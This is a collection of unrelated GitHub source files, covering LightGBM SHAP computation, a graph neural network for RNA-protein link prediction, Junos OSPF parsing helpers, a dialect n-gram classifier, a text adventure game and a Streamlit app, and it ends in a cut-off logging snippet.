train_test_split(\n self.X,\n self.y,\n test_size=test_size,\n random_state=loop_cnt\n )\n # test-data preparation\n X_train, X_valid, y_train, y_valid = train_test_split(\n X_train,\n y_train,\n test_size=test_size,\n random_state=loop_cnt\n )\n # training-data preparation\n d_train = lgb.Dataset(\n data=X_train,\n label=y_train\n )\n # valid-data preparation\n d_valid = lgb.Dataset(\n data=X_valid,\n label=y_valid\n )\n del X_train, y_train\n # training\n model =lgb.train(\n params=params,\n train_set=d_train,\n num_boost_round=num_boost_round,\n valid_sets=d_valid,\n early_stopping_rounds=early_stopping_rounds,\n verbose_eval=1000\n )\n # calculating test data au\n if params['objective'] == 'binary':\n # validation by test_data\n y_pred_test = model.predict(X_test, pred_contrib=False)\n fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred_test)\n auc = metrics.auc(fpr, tpr)\n print('test data auc: ', auc)\n del auc, fpr, tpr, thresholds, X_test, y_pred_test, d_train, d_valid\n # appending model into list\n 
self.model_list.append(model)\n del model\n\n def SHAP_Calculation(self, records_per_chunk=20000):\n print(\"SHAP calculation\")\n total_records = len(self.X)\n print(\"total records: \", total_records)\n chunk_num = total_records // records_per_chunk + 1\n # SHAP will be calculated for each model.\n for model_index, model in enumerate(self.model_list):\n print(\"model index: \", model_index)\n # To save RAM space, SHAP calculation and target-prediction are to be done in limited numbers of records at once.\n for i in range(chunk_num):\n print(\"chunk: \", i)\n index_lower_lim = records_per_chunk * i\n index_upper_lim = records_per_chunk * (i+1)\n X_chunk = self.X[index_lower_lim:index_upper_lim]\n print(\"records per chunk: \", len(X_chunk))\n # SHAP computation(for each chunk)\n shap_values = model.predict(X_chunk, pred_contrib=True)\n # target prediction(for each chunk)\n # Reshaped for merge\n prediction = model.predict(X_chunk, pred_contrib=False).reshape((-1, 1))\n del X_chunk\n # shap and target prediction will be merged into one array(for each chunk)\n shap_with_prediction = np.concatenate([shap_values, prediction],\n axis=1)\n del shap_values, prediction\n if i == 0:\n shap_per_model = shap_with_prediction\n else:\n shap_per_model = np.concatenate([shap_per_model, shap_with_prediction],\n axis=0)\n if len(self.model_list) > 1:\n # Axis will be added for subsequent calculation(averaging SHAPs over all models)\n shap_per_model = shap_per_model.reshape((1,\n shap_per_model.shape[0],\n shap_per_model.shape[1]))\n # To optimize the memory space, averaging will be done in sequential manner.\n # Calculations will occupy only 2 data arrays of memory space, making the proceduces scalable.\n if model_index == 0:\n shap_all = shap_per_model\n else:\n shap_all = np.concatenate(\n [shap_all*model_index, shap_per_model],\n axis=0)\n shap_all = shap_all.mean(axis=0) * 2 / (model_index+1)\n # ndarray will be reshaped after averaging except for the last step.\n if model_index != self.cv_cnt - 1:\n shap_all = shap_all.reshape((1,\n shap_all.shape[0],\n shap_all.shape[1]))\n\n # Convertion of SHAP to dataframe\n shap_column_list = self.X.columns.values + \"_shap\"\n shap_column_list = shap_column_list.tolist()\n shap_column_list.append(\"base_value\")\n shap_column_list.append(\"prediction\")\n df_shap_lgb = (\n pd.DataFrame(\n shap_all,\n columns=shap_column_list\n )\n )\n # Actual target values and unique key will be implemented.\n df_shap_lgb[\"target\"] = self.y\n if self.id_column != None:\n df_shap_lgb[self.id_column] = self.id_value\n\n return df_shap_lgb\n","repo_name":"NNihashi/SHAP-in-small-size-memory-machine","sub_path":"shap_app.py","file_name":"shap_app.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14307997122","text":"from class54.Stack import Stack\n\n\ndef solve(A,B,C):\n stack = Stack()\n stack.push(B)\n for a in C:\n if a == 0 and stack.size != -1:\n stack.pop()\n else:\n stack.push(a)\n return stack.top()\n\n\nA = 10\nB = 23\nC = [86, 63, 60, 0, 47, 0, 99, 9, 0, 0]\nA = 1\nB = 1\nC = [2]\nprint(solve(A,B,C))","repo_name":"SauravSinha76/scaler2","sub_path":"class54/ball_game.py","file_name":"ball_game.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72776091208","text":"from reader.reader import DataClass\nfrom printer.data_printer import data_printer\nfrom 
data_for_pandas.data_for_pandas import get_data_frame\nfrom statics.statics import StaticsClass\n\n\nif __name__ == '__main__':\n path = \"file_for_reading/\"\n file_name = path + \"data.dat\"\n\n reader = DataClass(file_name)\n reader.reader()\n data = reader.get_data_to_analyze()\n\n data_frame = get_data_frame(data)\n\n statics = StaticsClass(data_frame)\n\n pearson_matrix, spearman_matrix, kendall_matrix = statics.get_correlation_matrices()\n\n statics.heatmap_graphics()\n statics.scatter_matrix_graphics()\n","repo_name":"j25-delavega/statistic_analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37423540938","text":"import os\n\nfrom utills.evaluation import *\nfrom utills.utils import *\nfrom model.my_model import Model\n\nos.environ['CUBLAS_WORKSPACE_CONFIG'] = ':4096:8'\nseed = 1\nnp.random.seed(seed)\nrandom.seed(seed)\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.use_deterministic_algorithms(True)\n\ndata = open('dataset/NPR7317_processed/7317_r_p.txt', 'r')\nlinks = data.readlines()\nl = []\nfor link in links:\n link = link.strip()\n link = link.split(' ')\n link = [eval(ll) for ll in link]\n l.append(link)\nlinks = np.array(l)\n# train, test = split_train_test(links, 0.8)\n# np.save('dataset/NPR7317_processed/train73178',train)\n# np.save('dataset/NPR7317_processed/test73178',test)\ntrain, test = np.load('dataset/NPR7317_processed/train73178.npy'), np.load('dataset/NPR7317_processed/test73178.npy')\n# 生成训练图\nlink_src = train[:, 1]\nlink_dst = train[:, 0]\nhetero_graph = dgl.heterograph({\n ('protein', 'link', 'rna'): (link_src, link_dst),\n ('rna', 'link_by', 'protein'): (link_dst, link_src),\n})\nprint(hetero_graph)\n\n# 生成测试图\nt_link_src = test[:, 1]\nt_link_dst = test[:, 0]\nt_hetero_graph = dgl.heterograph({\n ('protein', 'link', 'rna'): (t_link_src, t_link_dst),\n ('rna', 'link_by', 'protein'): (t_link_dst, t_link_src),\n})\n\ntest_links = np.stack([t_link_src, t_link_dst], axis=1)\n\n# 节点特征\nrna_features1 = torch.load('dataset/NPR7317_processed/rna7317_feature.pkl')\nprotein_features1 = torch.load('dataset/NPR7317_processed/proteinRPI7317_feature.pkl')\nrna_features2 = torch.load('dataset/NPR7317_processed/RPIrna7317.emb')\nprotein_features2 = torch.load('dataset/NPR7317_processed/RPIprotein7317.emb')\nrna_features = torch.cat((rna_features1, torch.tensor(rna_features2)), dim=1)\nprotein_features = torch.cat((protein_features1, torch.tensor(protein_features2)), dim=1)\n# hetero_graph.nodes['rna'].data['feature'] = rna_features\nhetero_graph.nodes['rna'].data['feature'] = torch.tensor(rna_features2)\n# hetero_graph.nodes['protein'].data['feature'] = protein_features\nhetero_graph.nodes['protein'].data['feature'] = torch.tensor(protein_features2)\n\nk = 4\nepoches = 100\nlr = 2e-4\nweight_decay = 0\ndevice = 'cuda'\n\nmetapaths = [\n [[\"link\", \"link_by\"], [\"link\", \"link_by\", \"link\", \"link_by\"]],\n [[\"link_by\", \"link\"], [\"link_by\", \"link\", \"link_by\", \"link\"]]\n]\nmodel = Model([128, 128], 256, 256, 256, 4,2, 0.2, device, metapaths).to(device)\n# model = Model([128, 128], 256, 256, 256, 4,2, 0.2, device, metapaths).to(device)\nprotein_feats = hetero_graph.nodes['protein'].data['feature']\nrna_feats = hetero_graph.nodes['rna'].data['feature']\nnode_features = {'protein': protein_feats, 'rna': rna_feats}\nopt = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\nbest = 
0.0\n\n# 需要保证测试集的负样本不在训练集的正样本和负样本中\nt_negative_graph = construct_negative_graph(t_hetero_graph, 3, ('protein', 'link', 'rna'))\nsrc_dst1 = t_negative_graph.edges(etype='link')\nprotein_id1 = src_dst1[0]\nrna_id1 = src_dst1[1]\nneg = torch.stack([protein_id1, rna_id1], dim=1).numpy()\nneg1 = torch.stack([rna_id1, protein_id1], dim=1).numpy()\nll = []\nfor index, i in enumerate(neg1):\n dd = (i == links)\n d = np.sum(dd, axis=1)\n if 2 in d:\n ll.append(index)\nneg = np.delete(neg, ll, axis=0)\nnegative_graph = construct_negative_graph(hetero_graph, k, ('protein', 'link', 'rna'))\nnum_neg_edges = negative_graph.num_edges(etype='link')\nsrc_dst_neg = negative_graph.edges(etype='link')\nprotein_id_neg = src_dst_neg[0]\nrna_id_neg = src_dst_neg[1]\nneg11 = torch.stack([protein_id_neg, rna_id_neg], dim=1).numpy()\nl_need_remove = []\nfor idx, n in enumerate(neg11):\n dd = (n == test_links)\n d = np.sum(dd, axis=1)\n if 2 in d:\n l_need_remove.append(idx)\nn_r = num_neg_edges // k - len(l_need_remove)\nnegative_graph.remove_edges(l_need_remove)\nnum_neg_edges2 = negative_graph.num_edges(etype='link')\nridx = np.random.choice(num_neg_edges2, n_r, replace=False)\nnegative_graph.remove_edges(ridx)\nsrc_dst_neg = negative_graph.edges(etype='link')\nprotein_id_neg = src_dst_neg[0]\nrna_id_neg = src_dst_neg[1]\nneg11 = torch.stack([protein_id_neg, rna_id_neg], dim=1).numpy()\nlll = []\nfor index, i in enumerate(neg):\n dd = (i == neg11)\n d = np.sum(dd, axis=1)\n if 2 in d:\n lll.append(index)\nneg_test = np.delete(neg, lll, axis=0)\ntest_samples = dict()\ntest_samples['pos_samples'] = np.concatenate((np.array(test[:, 1])[:, None], np.array(test[:, 0])[:, None]), axis=1)\ntest_samples['neg_samples'] = neg_test\n# new_g1 = metapath_reachable_graph(hetero_graph, [\"link\", \"link_by\"])\n# new_g2 = metapath_reachable_graph(hetero_graph, [\"link_by\", \"link\"])\n# torch.save(new_g1,'dataset/NPR7317_processed/g7317_0_0.pkl')\n# torch.save(new_g2,'dataset/NPR7317_processed/g7317_1_0.pkl')\n# g_list = [[torch.load('dataset/NPR7317_processed/g7317_0_0.pkl'),torch.load('dataset/NPR7317_processed/g7317_0_1.pkl')],[torch.load('dataset/NPR7317_processed/g7317_1_0.pkl'),torch.load('dataset/NPR7317_processed/g7317_1_1.pkl')]]\n# edge_l = [torch.load('dataset/NPR7317_processed/edge7317_0_1.pkl'),torch.load('dataset/NPR7317_processed/edge7317_1_1.pkl')]\n# torch.save(g_list,'g_list7317.pkl')\n# torch.save(edge_l,'edge_l7317.pkl')\ng_list = torch.load('dataset/NPR7317_processed/g_list7317.pkl')\nedge_l = torch.load('dataset/NPR7317_processed/edge_l7317.pkl')\nfor epoch in range(epoches):\n\n pos_score, neg_score, h = model(g_list, hetero_graph, negative_graph, node_features, ('protein', 'link', 'rna'),\n edge_l)\n loss = compute_loss(pos_score, neg_score)\n opt.zero_grad()\n loss.backward()\n opt.step()\n\n embs = dict()\n embs['protein'] = h['protein'].cpu().detach()\n embs['rna'] = h['rna'].cpu().detach()\n avg_auroc, std_auroc, avg_auprc, std_auprc, acc, avg_recall, avg_spe, avg_pre, avg_mcc = link_prediction(epoch+1,embs,\n test_samples,\n 'hadamard')\n\n if avg_mcc > best:\n best = avg_mcc\n torch.save(h['protein'], 'protein.emb')\n torch.save(h['rna'], 'rna.emb')\n print(\n \"### epoch: {}, loss: {}, Average(over trials) of NPI-HetGNN: AUROC: {:.4f}({:.4f}), AUPRC: {:.4f}({:.4f}), ACC: {:.4f},Recall: {:.4f}, Specifity: {:.4f},Precision: {:.4f},MCC: {:.4f}\".format(\n epoch + 1,\n loss.item(),\n avg_auroc,\n std_auroc,\n avg_auprc,\n std_auprc,\n acc,\n avg_recall,\n avg_spe,\n avg_pre,\n 
avg_mcc))\n","repo_name":"xiaoliu166370/NPI-HetGNN","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42327596641","text":"\"\"\"Common get info functions for OSPF\"\"\"\n\n# Python\nimport logging\nimport datetime\nimport re\n\n# Genie\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\nfrom genie.utils.timeout import Timeout\n\nlog = logging.getLogger(__name__)\n\n\ndef get_ospf_interface_and_area(device):\n    \"\"\" Retrieve interface for ospf on junos device\n\n        Args:\n            device ('obj'): Device object\n\n        Returns:\n            interface and area value dictionary\n    \"\"\"\n    try:\n        out = device.parse(\"show ospf interface brief\")\n    except SchemaEmptyParserError as spe:\n        raise SchemaEmptyParserError(\n            \"Could not parse output for\"\n            \" command 'show ospf interface brief'\") from spe\n\n    key_val = {}\n\n    try:\n        interface_dict = out[\"instance\"][\"master\"][\"areas\"]\n        for k, v in interface_dict.items():\n            for interface in v[\"interfaces\"].keys():\n                key_val.update({interface: k})\n    except KeyError as ke:\n        raise KeyError(\"Key issue with exception: {}\".format(str(ke))) from ke\n    return key_val\n\ndef get_ospf_spf_scheduled_time(log):\n    \"\"\"\n    Get OSPF spf scheduled time in log 'Jun 12 03:32:19.068983 OSPF SPF scheduled for topology default in 8s' \n\n    Args:\n        log ('str'): log string\n\n    Returns:\n        date time ('str') \n    \"\"\" \n    # Jun 12 03:32:19.068983 OSPF SPF scheduled for topology default in 8s\n    p_scheduled = ('(?P<date>\\\S+\\\s+\\\d+) (?P<scheduled_time>\\\d+\\\:\\\d+\\\:\\\d+\\\.\\\d+) '\\\\\n                   'OSPF SPF scheduled for topology default in (?P<spf_delay>\\\d+)s') \n    m = re.match(p_scheduled, log)\n\n    try:\n        if m:\n            group = m.groupdict()\n            scheduled_time = group['scheduled_time']\n            return scheduled_time\n    except KeyError as e:\n        raise KeyError(f\"Key issue with exception: {str(e)}\") from e\n    \n    \n\ndef get_ospf_spf_start_time(log):\n    \"\"\"\n    Get OSPF spf start time in log 'Jun 12 03:40:19.068983 Starting full SPF for topology default' \n\n    Args:\n        log ('str'): log string\n\n    Returns:\n        date time ('str') \n    \"\"\"\n    # Jun 12 03:40:19.068983 Starting full SPF for topology default\n    p_start = (\n        '(?P<date>\\\S+\\\s+\\\d+) (?P<start_time>\\\d+\\\:\\\d+\\\:\\\d+\\\.\\\d+) Starting full SPF for topology default'\n    ) \n    m = re.match(p_start, log)\n    \n    try:\n        if m:\n            group = m.groupdict()\n            start_time = group['start_time']\n            return start_time\n    except KeyError as e:\n        raise KeyError(f\"Key issue with exception: {str(e)}\") from e\n    \n    return None\n\ndef get_ospf_database_checksum(device, lsa_type=None):\n    \"\"\" Get ospf database checksum data in a list\n\n    Args:\n        device (obj): Device object\n        lsa_type (str, optional): LSA type to check for. 
Defaults to None.\n\n Returns:\n list: List of checksums\n \"\"\"\n\n try:\n out = device.parse('show ospf database')\n except SchemaEmptyParserError:\n return list()\n \n ret_list = []\n\n # Example dict\n # {\n # 'ospf-database-information': {\n # 'ospf-database': [{\n # 'lsa-type': 'Router',\n # 'checksum': '0xa9b6',\n # }]\n # }\n # }\n\n for entry_ in out.q.get_values('ospf-database'):\n if lsa_type and entry_.get('lsa-type') != lsa_type:\n continue\n\n if entry_.get('checksum'):\n ret_list.append(entry_.get('checksum'))\n\n return ret_list\n\ndef get_ospf_router_id(device):\n \"\"\" Retrieve ospf router id\n\n Args:\n device (obj): Device object\n \"\"\"\n try:\n output = device.parse('show ospf overview')\n except SchemaEmptyParserError:\n return None\n \n try:\n return output.q.get_values('ospf-router-id', 0)\n except Exception as e:\n log.info(\"Error retrieving router ID: {e}\".format(e=e)) \n return None\n \ndef get_ospf_neighbors_instance_state_count(device, expected_neighbor_state='Full', max_time=60, check_interval=10):\n \"\"\" Get ospf neighbors instance state count\n\n Args:\n device (obj): Device object\n expected_neighbor_state (str): Expected neighbor state. Defaults to 'Full'. \n max_time (int, optional): Maximum timeout time. Defaults to 60 seconds.\n check_interval (int, optional): Check interval. Defaults to 10 seconds.\n \"\"\"\n try:\n out = device.parse('show ospf neighbor instance all')\n except SchemaEmptyParserError:\n return None\n\n state_count = out.q.contains_key_value('ospf-neighbor-state', \n expected_neighbor_state).count()\n\n return state_count\n\ndef get_ospf_neighbor_count(device, expected_state=None, output=None, max_time=60, check_interval=10):\n \"\"\" Get ospf neighbors count\n\n Args:\n device (`obj`): Device object\n expected_state (`str`): Expected neighbor state. Defaults to None\n output (`str`): output of show ospf neighbor. Default to None\n max_time (`int`, optional): Maximum timeout time. Defaults to 60 seconds.\n check_interval (`int`, optional): Check interval. 
Defaults to 10 seconds.\n \"\"\"\n try:\n if output:\n out = device.parse('show ospf neighbor', output=output)\n else:\n out = device.parse('show ospf neighbor')\n except SchemaEmptyParserError:\n return 0\n\n # example out out\n # {\n # \"ospf-neighbor-information\": {\n # \"ospf-neighbor\": [\n # {\n # \"activity-timer\": \"32\",\n # \"interface-name\": \"ge-0/0/0.0\",\n # \"neighbor-address\": \"12.0.0.2\",\n # \"neighbor-id\": \"2.2.2.2\",\n # \"neighbor-priority\": \"128\",\n # \"ospf-neighbor-state\": \"Full\"\n # },\n\n if expected_state:\n return len(out.q.contains_key_value('ospf-neighbor-state', expected_state))\n else:\n return len(out.q.get_values('ospf-neighbor'))\n\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/junos/ospf/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"13396633185","text":"#when a model's accuracy start to decrease when the complexity increase, the model is overfitted\n# coding: utf-8\n\nimport numpy as np\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression\nfrom collections import Counter\n\n\ndef ngrams(s, n):\n ngram = []\n # print(\"S\", s)\n s = s.strip().split(\" \")\n for i in range(len(s) - n + 1):\n gram = \"\"\n for j in range(n):\n gram = gram + s[i + j]\n ngram.append(gram)\n\n #print(\"ngram\", ngram)\n return ngram\n\n\ndef logi_re(features, gender):\n m = LogisticRegression()\n m.fit(features, gender)\n #print(m.predict(X=test_matrix))\n return m\n\n\ndef svc_re(features, gender):\n m2 = LinearSVC()\n m2.fit(features, gender)\n #print(m2.predict(X=test_matrix))\n return m2\n\n\nt_counts = Counter() # counting taiwanese words frequency\nm_counts = Counter() # counting mandarin words frequency\ntotal_counts = Counter() # counting total number of words\n\n\ndef tm_count(word, gen):\n if gen == 'T':\n for w in word:\n t_counts[w] += 1\n total_counts[w] += 1\n elif gen == 'M':\n for w in word:\n m_counts[w] += 1\n total_counts[w] += 1\n\n\nt_m_ratios = Counter()\nt_m_raw_ratios = Counter()\n\n\ndef tf_idf():\n #print(\"LIST count:\" + str(list(total_counts.most_common())))\n for word, cnt in list(total_counts.most_common()):\n if cnt > 1:\n t_m_ratio = t_counts[word] / float(m_counts[word] + 1)\n t_m_ratios[word] = t_m_ratio\n #print(\"word in count:\"+ word)\n #print(\"ratio:\" + str(t_m_ratio))\n\n t_m_raw_ratios = t_m_ratios\n #print(\"LIST:\" + str(list(t_m_ratios.most_common(100))))\n for word, ratio in list(t_m_ratios.most_common()):\n t_m_ratios[word] = np.log(ratio + 0.01)\n #print(\"word: \" + word)\n #print(t_m_ratios[word])\n list(reversed(t_m_ratios.most_common()))\n\ndef run_train(path, n):\n sentence = []\n dialects = []\n with open(path, 'r') as fp:\n for line in fp:\n w, g = line.strip().split('\\t')\n # words.append('#'+w+'#')\n sentence.append('#' + w + '#')\n dialects.append(g)\n # tm_count(w, g)\n\n ng_set = set()\n w_feat = []\n\n for w, g in zip(sentence, dialects):\n bg = ngrams(w, n)\n tm_count(bg, g)\n tf_idf()\n w_feat.append(set(bg))\n ng_set.update(bg)\n\n features = np.zeros((len(sentence), len(ng_set)), dtype=np.int8)\n print(\"BG: \" + str(bg))\n for i, w in enumerate(w_feat):\n for j, bg in enumerate(ng_set):\n if bg in w:\n features[i, j] = 1\n print(\"features old:\")\n print(features[i,j])\n print(t_m_ratios[bg])\n #print(t_m_ratios[\"我的\"])\n if t_m_ratios[bg] != 0:\n features[i,j] = 
(float(t_m_ratios[bg])* float(features[i,j]))\n print(\"features new:\")\n print(features[i, j])\n\n return features, dialects, len(sentence), len(ng_set), ng_set\n\n\ndef run_test(path, len1, len2, ng_set1, n):\n sentence = []\n dialects = []\n with open(path, 'r') as fp:\n for line in fp:\n w, g = line.strip().split('\\t')\n sentence.append('#' + w + '#')\n dialects.append(g)\n\n w_feat = []\n\n for w in sentence:\n bg = ngrams(w, n)\n w_feat.append(set(bg))\n\n features = np.zeros((len1, len2), dtype=np.int8)\n\n\n for i, w in enumerate(w_feat):\n for j, bg in enumerate(ng_set1):\n if bg in w:\n features[i, j] = 1\n features[i, j] *= t_m_ratios[bg]\n for i in range(14770):\n dialects.append('T')\n\n return features, dialects\n\n\nif __name__ == '__main__':\n train = '../data/simp_16770.train'\n test = '../data/simp_2000.test'\n features, dialect, len1, len2, ng_set = run_train(train, 3)\n test_matrix = np.zeros((len1, len2), dtype=np.int8)\n # m = logi_re(features, dialect)\n svm = svc_re(features, dialect)\n\n # print(\"TRAIN:\", m.score(features, dialect))\n print(\"TRAIN:\", svm.score(features, dialect))\n features_test, dialect_test = run_test(test, len1, len2, ng_set, 3)\n\n # print(\"TEST:\", m.score(features_test, dialect_test))\n score = svm.score(features_test, dialect_test)\n accuracy = ((16770 * score - 14770) / 2000) * 100\n print(\"TEST: \", accuracy, '%')\n print(\"T\", t_counts.most_common(20))\n print(\"M\", m_counts.most_common(20))\n # pre_test = m.predict(features_test, gender_test)\n # confusion_matrix(gender_test, pred_test)\n # compare model with some base line\n","repo_name":"cicl2018/vardial-dmt","sub_path":"kars/imporve_accuracy_Kelly.py","file_name":"imporve_accuracy_Kelly.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30897176005","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMaze - Projekt\n\"\"\"\n\nimport maze\nimport re\nimport sys\nimport getopt\nimport os.path\n\ndef main():\n \"\"\"\n Main method, starts program\n \"\"\"\n try:\n opts, _ = getopt.gnu_getopt(\n sys.argv[1:], 'hivacl:', ['help', 'info', 'load=', 'version', 'about', 'cheat']\n )\n except getopt.GetoptError as error:\n print(error)\n print_usage()\n\n # Setup default parameter 'game_file' to include calling Game constructor\n params = {'game_file': None}\n\n # Parse options from command prompt. 
If multiple are given, act on the first found\n # The statements isn't \"else checked\" but each method will do sys.exit()\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n print_usage()\n if opt in ('-i', '--info'):\n print_info()\n if opt in ('-v', '--version'):\n print_version()\n if opt in ('-a', '--about'):\n print_about()\n if opt in ('-c', '--cheat'):\n print_cheats()\n\n # Check if a file given to load actually exists\n if opt in ('-l', '--load'):\n if not os.path.isfile(arg):\n print(\"File {!s} not found!\".format(arg))\n sys.exit(0)\n\n params['game_file'] = arg\n\n # No parameter that will terminate the program given, start the game\n run_game(params)\n sys.exit(0)\n\ndef run_game(params):\n \"\"\"\n The main loop keeping the game alive\n \"\"\"\n # Create default Game object\n g = maze.Game(params)\n\n # No need to print the info if a user previously played\n if g.game_file == None:\n g.print_game_info()\n print()\n\n g.print_room_info()\n\n while True:\n if g.game_completed == True:\n return\n\n user_input = input(\">>> \")\n\n # Check if the user input was a single letter/word and act on it\n if user_input in ('i', 'info'):\n g.print_room_info()\n elif user_input in ('h', 'hjälp', 'help'):\n g.print_help()\n elif user_input in ('fr', 'fram', 'forward'):\n g.goto_next_room()\n elif user_input in ('ba', 'bak', 'back'):\n g.goto_prev_room()\n elif user_input in ('se', 'look'):\n g.look_around() # Should describe room?\n elif user_input in ('l', 'ledtråd', 'hint'):\n g.print_hint()\n elif user_input in ('objekt', 'o'):\n g.look_around()\n elif user_input in ('inv', 'inventarier'):\n g.list_inventory()\n elif user_input in ('spara', 'sp', 'save'):\n g.save_game()\n elif user_input in ('q', 'quit'):\n break\n\n # Parse input to find action and object\n input_re = re.compile(r'^(\\w+) (.+)$')\n input_match = input_re.search(user_input)\n\n # Check that we even got a match (two words)\n if input_match == None:\n continue\n\n # Check that both groups are assigned\n if input_match.group(2) == None:\n continue\n\n # Save the action and original object (to print according to user input)\n (action, orig_obj) = (input_match.group(1), input_match.group(2))\n\n # Strip user input and make it lowercase\n obj = orig_obj.lower()\n obj = re.sub(r\"['\\.]\", \"\", obj, flags=re.IGNORECASE)\n\n # Actions you can do with inventory\n inv_actions = ['sl', 'släpp', 'drop',\n 'a', 'användä', 'use']\n\n # Actions you can do with objects\n obj_actions = ['t', 'titta', 'see',\n 'ö', 'öppna', 'open',\n 's', 'sparka', 'kick',\n 'f', 'flytta', 'move',\n 'ta', 'take']\n\n if action not in inv_actions and action not in obj_actions:\n print(\"I don't know what you men by '{!s}'... 
Type 'help' to see what you can do.\".format(action))\n continue\n\n if action in inv_actions and obj not in g.inventory:\n print(\"Hmm, I can't see {!s} in the inventory...\".format(orig_obj))\n continue\n\n if action in obj_actions and obj not in g.current_room['objects']:\n print(\"There's no {!s} in this room!\".format(orig_obj))\n continue\n\n # Based on action, send the object to relevant method in Game\n if action in ('t', 'titta', 'see'):\n g.look_at_object(obj)\n elif action in ('ö', 'öppna', 'open'):\n g.open_object(obj, None)\n elif action in ('s', 'sparka', 'kick'):\n g.kick_object(obj, None)\n elif action in ('f', 'flytta', 'move'):\n g.move_object(obj, None)\n elif action in ('ta', 'take'):\n g.take_object(obj)\n elif action in ('sl', 'släpp', 'drop'):\n g.drop_object(obj, None)\n elif action in ('a', 'använd', 'use'):\n g.use_object(obj)\n\ndef print_usage():\n \"\"\"\n Prints usage/help for porgram\n \"\"\"\n print(\"Usage: {!s}\\n\".format(sys.argv[0]))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--help\", \"-h\", \"Print this help text\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--info\", \"-i\", \"Print info about the game\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--version\", \"-v\", \"Print version of the program\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--about\", \"-a\", \"Print information about the developer\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--cheat\", \"-c\", \"Print available cheats and tricks\"))\n print(\"{: <10} | {: <4} - {!s}\".format(\"--load\", \"-l\", \"Load game from save file\"))\n sys.exit(0)\n\ndef print_info():\n \"\"\"\n Information about the program\n \"\"\"\n print(r\"\"\"- INFO -\nThis is the text based game called adventure.py! In the game the user is taken through\nseveral rooms and by moving, kicking or opening objects found around in the game, the player\nwill be able to open up new paths to discover the next room.\n\nTo make it possible to complete the game, the player is equipped with a backpack (inventory)\nthat can hold stuff picked up in the game.\"\"\")\n sys.exit(0)\n\ndef print_version():\n \"\"\"\n Print current version\n \"\"\"\n print(r\"\"\"- VERSION -\n0.2b\"\"\")\n sys.exit(0)\n\ndef print_about():\n \"\"\"\n Information about the developer\n \"\"\"\n print(r\"\"\"- ABOUT -\nThis game is developed by Simon Sawert\n\"\"\")\n sys.exit(0)\n\ndef print_cheats():\n \"\"\"\n Cheats that can be used in the game\n \"\"\"\n print(\"- CHEATS -\")\n\n # Game has an option to print every room and it's object so we call it\n g = maze.Game({'game_file': None})\n g.print_game_objects()\n\n # Added this manually, didn't figure out a way to do this automatically\n # and I guess this is only used for the teacher correcting the task\n print(r\"\"\"\nCopy/paste to complete the game:\n\ns mirror\ns photo frame\nta wardrobe key\nta shattered glass\na wardrobe key\nfr\na shattered glass\nta zippo\nf drawer\na zippo\nfr\nta remote\na remote\nta door key\na door key\nfr\ns globe\nta toy car\na toy car\nfr\nf gurney\nta scalpel\na scalpel\nta small key\na small key\nfr\nf pillars\nta hammer\na hammer\nta crowbar\na crowbar\nfr\nö knight's helmet\nta silver key\nba\nba\nba\na silver key\nta stone\nfr\nfr\nfr\na stone\nta gate key\n# a gate key # - This completes the game\n\"\"\")\n\n sys.exit(0)\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"bombsimon/py-adventure","sub_path":"adventure.py","file_name":"adventure.py","file_ext":"py","file_size_in_byte":7311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19101351163","text":"import streamlit as st\nimport gateway\n\ndef header():\n st.header('Antibloqueo')\n st.markdown(\"##### Supere el bloqueo del escritor. \")\n st.text('version 0 - Last update 08/08/2022')\n\ndef instert_text():\n txt = st.text_area(\"-\")\n colum1, colum2,colum3,colum4,colum5 = st.columns([1,1,1,1,1])\n\n if colum1.button(\"Escriba Más\"):\n with st.spinner(text='en progreso'):\n \n new_txt, status = gateway.conect_antibloqueo(txt)\n status = 200\n \n if status == 200:\n st.text_area(label=\"Escriba!\", value=new_txt, height=250)\n st.success(\"Sucess!\") \n else:\n st.text_area(label=\"Error:\", value=new_txt[\"Error\"])\n st.error(new_txt[\"Error\"]) \n \n if colum2.button(\"Limpiar\"):\n st.info(\"cleaning\")\n\nst.sidebar.markdown(\"# Antibloqueo ❄️\")\nheader()\ninstert_text()","repo_name":"Moris-Polanco/NLP-Apps","sub_path":"antibloqueo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72633874887","text":"import logging\n\n\"\"\"\nDEBUG\nINFO\nWARNING\nERROR\nCRITICAL\n\"\"\"\n\n\n# logger configuration\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\nformatter = logging.Formatter(\n '%(asctime)s - line %(lineno)d in %(filename)s - %(message)s')\n\nfile_handler = 